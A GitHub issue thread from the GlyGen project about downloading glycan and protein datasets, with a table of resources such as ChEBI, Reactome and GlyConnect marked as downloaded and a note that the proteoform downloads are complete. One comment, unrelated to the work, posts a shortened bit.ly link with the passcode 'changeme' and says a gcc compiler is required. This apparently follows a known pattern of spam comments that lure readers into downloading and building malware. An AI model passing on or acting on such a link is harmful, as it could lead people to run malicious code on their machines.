### ISSUE TITLE
Data download (Glycan)

### ISSUE THREAD

**Issue by ReneRanzinger** [glygener/glygen-issues#1730]
Download the glycan and protein datasets in preparation of pre-processing.

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by ubhuiyan** [comment]
| Resource | Downloaded by |Completed (Y/N)| Notes | Issue | 
| -------- | ------- | ------- | ------- |------- |
| Cellosaurus |Urnisha|Y| | |
| ChEBI|Urnisha|Y| | |
| MatrixDB |Urnisha|Y| | |
| Reactome | Urnisha| Y|  | |
| Glyconnect | Urnisha | Y| New Species|
| IPTMnet| Urnisha| Y| | |
| MCW O-GlcNAc  |Urnisha | Y |  |
| OMA |Urnisha | Y |New Species | |
| O-GlcNAcAtlas| Urnisha | Y|9New Species | |


[Proteoform and Protein Data Download Doc](https://gwu0.sharepoint.com/:w:/r/sites/GlyGenTeam-GRP/_layouts/15/doc2.aspx?sourcedoc=%7BE6511E4F-F88A-452F-AB40-DAE665A5E949%7D&file=Data%20Download%20-%20Proteoform.docx&action=default&mobileredirect=true)

**Comment by ubhuiyan** [comment]
All proteoform downloads have been completed.
